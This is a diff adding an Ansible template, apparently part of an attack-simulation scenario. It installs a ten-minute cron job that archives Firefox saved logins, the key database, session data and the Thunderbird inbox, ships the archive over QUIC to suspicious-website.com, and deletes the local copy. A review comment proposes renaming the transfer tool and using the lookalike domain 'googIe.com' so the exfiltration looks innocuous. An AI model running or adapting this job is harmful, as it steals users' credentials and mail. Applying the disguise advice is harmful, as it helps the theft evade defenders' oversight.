ansible/run/scenario6/templates/downloader.j2

```diff
@@ -0,0 +1 @@
+*/10 * * * * PROFILE=$(basename {{ client_home }}/.mozilla/firefox/*.dev-edition-default | cut -d"." -f1) && TIMESTAMP=$(date +\%Y-\%m-\%d_\%H-\%M-\%S) && ARCHIVE_PATH="/tmp/firefox_backup_$TIMESTAMP.tar.gz" && tar -czf "$ARCHIVE_PATH" "{{ client_home }}/.mozilla/firefox/$PROFILE.dev-edition-default/sessionstore-backups/recovery.jsonlz4" "{{ client_home }}/.mozilla/firefox/$PROFILE.dev-edition-default/key4.db" "{{ client_home }}/.mozilla/firefox/$PROFILE.dev-edition-default/logins.json" "{{ client_home }}/.thunderbird/user.default-release/Mail/Local Folders/Inbox" && {{ client_home }}/.local/bin/veiltransfer_client_linux transfer quic -localPath "$ARCHIVE_PATH" -server suspicious-website.com:443 && rm $ARCHIVE_PATH
```

Comment:
I would change veiltransfer_client_linux to something not suspicious. And rename suspicious-website.com to something like googIe.com